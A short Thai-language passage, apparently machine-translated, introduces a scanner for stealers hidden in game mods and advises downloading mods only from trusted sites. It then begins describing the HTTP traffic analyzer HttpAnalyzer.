ฉันขอเตือนคุณทันทีว่าโปรแกรมนี้จะไม่ปกป้องบัญชีของคุณ 100% เช่นเดียวกับโปรแกรมป้องกันไวรัสหรือสแกนเนอร์อื่นๆ เมื่อพวกเขาเขียนบนหน้าปกของการป้องกันไวรัส 100% สำหรับฉันนี่เป็นสัญญาณให้ลบโปรแกรมป้องกันไวรัสออกจากดิสก์แล้ว แต่เครื่องสแกนนี้สามารถเร่งความเร็วในการตรวจสอบผู้ขโมยที่รู้จักอยู่แล้ว และช่วยให้คุณหลีกเลี่ยงการตกเป็นเหยื่อของผู้จัดจำหน่ายที่ไม่มีประสบการณ์
โปรแกรมป้องกันไวรัสที่ดีที่สุดคือการตัดสินใจของคุณ - จะดาวน์โหลดหรือไม่ดาวน์โหลด ดาวน์โหลด mods จากไซต์ที่เชื่อถือได้เท่านั้นและที่ที่มีการตรวจสอบความปลอดภัยของไฟล์เก็บถาวร

แบบแผนบางโปรแกรม:

ในการพัฒนา

HttpAnalyzer เป็นตัววิเคราะห์การรับส่งข้อมูลเครือข่าย หากคุณกำลังมองหาเครื่องมือที่ใช้งานได้ซึ่งมีวัตถุประสงค์เพื่อตรวจสอบการรับส่งข้อมูล HTTP และ HTTPS แบบเรียลไทม์ ฉันคิดว่าคุณควรชอบโปรแกรมนี้ มันเป็นโปรแกรมดมกลิ่นที่สามารถแสดงข้อมูลที่จำเป็นทั้งหมดเกี่ยวกับการเชื่อมต่อได้อย่างชัดเจน!

โดยทั่วไป HTTP Analyzer สามารถทำสิ่งต่างๆ ได้มากมาย ฉันคิดว่าคุณสามารถอ่านรายละเอียดเพิ่มเติมได้บนเว็บไซต์อย่างเป็นทางการ ฉันเขียนแนวคิดหลักไว้